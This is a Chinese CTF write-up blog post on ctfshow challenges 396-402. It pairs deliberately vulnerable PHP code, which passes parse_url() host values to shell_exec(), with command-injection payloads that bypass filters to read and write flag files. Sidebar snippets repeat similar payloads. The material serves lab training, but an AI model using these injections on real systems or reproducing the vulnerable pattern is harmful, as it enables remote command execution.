ctfshow其他

最新推荐文章于 2024-09-09 11:04:38 发布
最新推荐文章于 2024-09-09 11:04:38 发布
阅读量615 收藏 1
点赞数
分类专栏: CTF题目 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45655564/article/details/119981043
版权
这篇博客记录了作者在CTF挑战中遇到的多个PHP环境下的问题,包括payload的使用、绕过检测的方法以及针对不同过滤规则的解决策略。内容涉及IP地址解析、非法字符绕过、字符串大小写不敏感等技术细节,展示了在Web安全领域中的一些常见漏洞利用技巧。
摘要由CSDN通过智能技术生成

396

<?php
error_reporting(0);
if(isset($_GET['url'])){
   
    $url = parse_url($_GET['url']);
    shell_exec('echo '.$url['host'].'> '.$url['path']);

}else{
   
    highlight_file(__FILE__);
}

payload

url=http://`tac fl*`/var/www/html/1.txt

397


error_reporting(0);
if(isset($_GET['url'])){
   
    $url = parse_url($_GET['url']);
    shell_exec('echo '.$url['host'].'> /tmp/'.$url['path']);

}else{
   
    highlight_file(__FILE__);
}

url = http://'tac fl*'/../var/www/html/1.txt

398

error_reporting(0);
if(isset($_GET['url'])){
   
    $url = parse_url($_GET['url']);
    if(!preg_match('/;/', $url['host'])){
   
        shell_exec('echo '.$url['host'].'> /tmp/'.$url['path']);
    }

}else{
   
    highlight_file(__FILE__);
}

url=http://1/1;echo `cat fl0g.php`>a.txt

399

error_reporting(0);
if(isset($_GET['url'])){
   
    $url = parse_url($_GET['url']);
    if(!preg_match('/;|>/', $url['host'])){
   
        shell_exec('echo '.$url['host'].'> /tmp/'.$url['path']);
    }

}else{
   
    highlight_file(__FILE__);
}

同上

400

error_reporting(0);
if(isset($_GET['url'])){
   
    $url = parse_url($_GET['url']);
    if(!preg_match('/;|>|http|https/i', $url['host'])){
   
        shell_exec('echo '.$url['host'].'> /tmp/'.$url['path']);
    }

}else{
   
    highlight_file(__FILE__);
}

同上

401

#error_reporting(0);
if(isset($_GET['url'])){
   
    $url = parse_url($_GET['url']);
    var_dump($url);
    if(!preg_match('/;|>|http|https|\|/i', $url['host'])){
   
        shell_exec('echo '.$url['host'].'> /tmp/'.$url['path']);
    }

}else{
   
    highlight_file(__FILE__);
}

同上

402

#error_reporting(0);
if(isset($_GET['url'])){
   
    $url = parse_url($_GET['url']);
    var_dump($url);
    if(preg_match
最低0.47元/天 解锁文章
Anfy1
关注
专栏目录
CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web
2401_84297944的博客
04-28 987
F12。
ctfshow WEB入门 文件上传151-170_ctfshow web入门文件包含167(2)
2401_84297265的博客
04-28 986
这里我的后门代码给的是post一定要把请求方法改成post(URL前面的),我以前一直没有注意这个细节,想来有很多莫名其妙的问题多半是因为这个。这里希望能得到大家的指点。我还尝试了对比上传两张图片的内容,在非修改处的地方进行插入木马,但是错了,不知道是因为我操作上有问题,还是说这样会导致图片内容不完整。说明里面的后门代码生效了,且内容在图片内容里面,抓包或者010editor等里面才看得出来,浏览器看不出来。且这道题对图片内容也有检测,也就是说不能像之前的题给它传一个图片头就完了,要有合法的图片内容。
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
CTFshow——其他
D.MIND 的博客
08-17 1978
396——parse_url() 需要加上绝对路径 /?url=http://ls;echo `ls`/var/www/html/2.txt /?url=http://ls;echo `cat f*`/var/www/html/3.txt 397——parse_url() 使用../迁移目录 /?url=http://;echo `cat f*`/../var/www/html/1.txt 398~401 通杀了… ?url=http://`cat f*`/../var/www/html/7.txt
[CTF夺旗赛] CTFshow Web1-14 详细过程保姆级教程~
最新发布
Da1NtY的博客
09-09 4431
​ CTFShow通常是指网络安全领域中的“Capture The Flag”(夺旗赛)展示工具或平台。这是一种用于分享、学习和展示信息安全竞赛中获取的信息、漏洞利用技巧以及解题思路的在线社区或软件。参与者会在比赛中收集“flag”,通常是隐藏在网络环境中的数据或密码形式,然后通过分析、破解等手段找到并提交。CTFShow可以帮助人们了解最新的安全技术和挑战,同时也促进了安全知识和技术的交流。
CTFSHOW其他篇
羽的博客
02-05 2723
web396、397、398、399、400、401 url=http://1/1;echo `ls`>a.txt url=http://1/1;echo `cat fl0g.php`>a.txt web402 payload:url=file://1/1;echo `cat fl0g.php`>a.txt web403 url=http://127.0.0.1/1;echo `cat fl0g.php`>a.txt
ctfshow 其他
qq_45951598的博客
01-11 3276
web396、397、398、399、400、401 parse_url 绕过 源码 error_reporting(0); if(isset($_GET['url'])){ $url = parse_url($_GET['url']); shell_exec('echo '.$url['host'].'> '.$url['path']); }else{ highlight_file(__FILE__); } 这里没有什么限制直接绕过 payload一 ?url=http
ctfshow 其他(持续更新)
Lum1n0us's Blog
08-13 1603
文章目录web396web397-401web402web403web404web405 web396 <?php error_reporting(0); if(isset($_GET['url'])){ $url = parse_url($_GET['url']); shell_exec('echo '.$url['host'].'> '.$url['path']); }else{ highlight_file(__FILE__); } 可以先在本地测试一下pars
隐写_Jphswin_ctfshow.rar
08-26
这个压缩包文件“隐写_Jphswin_ctfshow.rar”显然包含了这个工具的可执行文件,很可能用于参加类似于CTF(Capture The Flag)的信息安全竞赛或挑战。 Jphswin是一个基于JPEG图片的隐写工具,它利用JPEG文件格式的...
[CTFSHOW]CTFSHOW-其他WP
Y4tacker的博客
02-10 2883
文章目录说在前面Web396(下面其实有通杀的但是得多试试其他的)Web397-Web401Web402We4b03Web404web405Web406Web407Web408Web409web410web411web412web413web414web415web416Web417web418web419web420web421-422web423web424-web431web432web433web434web435-436web437-438web439-440web441web442web443w
ctfshow web入门 其他 web396--web412
2301_81040377的博客
05-21 679
这里我们要调用cafe类里面的add方法,而检验完IP之后刚好会使用call_user_func进行函数的调用。这里的函数写的是将//和ctfshow进行一个拼接,那我们就可以使用一个换行进行绕过。这里说明了host必须是正常域名,我们就不能写命令了,只能用;还可以弹回显,直接不就用哦本地了,但是没影响直接打。对host过滤了分号,没影响。里面讲了危险函数的绕过。把http改成1就行。
ctfshow-web入门-其他分类(部分wp)-396-403
yutianovo的博客
01-16 657
396 传入 ?url=s;cat ls -al > 1.txt 得到 flag 位置 total 24 drwxrwxrwx 1 www-data www-data 4096 Jan 16 06:31 . drwxr-xr-x 1 root root 4096 Oct 31 2019 .. -rw-r--r-- 1 www-data www-data 0 Jan 16 06:31 1.txt -rw-r--r-- 1 w
ctfshow
m0_73867210的博客
02-20 162
一、web89 看了下源码,是要传一个num,但是0-9都被过滤了 有两函数不认识搜一下 然后在前面见过preg_match是一个正则匹配式,又去了解了一下,数字被过滤了,那可以考虑一下数组绕过(看的别人的,hhh) 随便传一个数组得到flag 二、web90 分析代码,和刚才那个差不多,但是出现了一个===,还有intval函数的用法还是不太会,再查一下 传入八进制得到flag 试一下字母,也可以得
ctf.show
giaogiao123的博客
02-15 288
进入页面首先看到一个题目看hint ?cmd 有了源码 看大佬的笔记这是一个php短标签,正则匹配 考虑绕过 ?cmd=?><?=`/???/?p /???????? p.p`;?> 然后出现文件下载,咱也不知道为撒,反正师傅都是这么写的,让我学明白了在更。 ...
ctfshow web133和其他命令执行的骚操作
Firebasky的博客
10-15 4742
这里是总结自己最近遇到的命令执行题,感觉还是不错分享出来。也欢迎师傅们评论一些骚操作 1. ISITDTU QUALS 2020 REC <?php // error_reporting(E_ALL); // ini_set('display_errors', '1'); function trigonometric_check($code) { // Check length if (strlen($code) >= 0x100) {//256长度 retu.
ctfshow Nodejs
weixin_63231007的博客
03-08 768
承接上文nodejs原型链漏洞刷题练习
ctfshow(刷题经历)
qq_62046696的博客
06-26 1697
1、打开以后看见filename=后面感觉是一个base64编码,接着解码一下,发现等于keys.txt,通常的源文件应该是index.php2、对index.php进行base64编码并作为新的filename的参数3、查看源文件,其里line变量起到控制行数的作用: http://114.67.246.176:13972/index.php?line=1&filename=aW5kZXgucGhw发现爆出了第一行隐含的代码,4、编写python脚本,查看全部源码 这样代码就出来了下图:5、分析PH
ctfshow xss
07-31
XSS(Cross-Site Scripting)是指攻击者通过恶意注入可以执行的JavaScript或其他客户端脚本到网站上,当用户浏览包含这些脚本的页面时,脚本会被浏览器执行,可能会窃取用户的敏感信息,如登录凭证、会话 cookies 等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值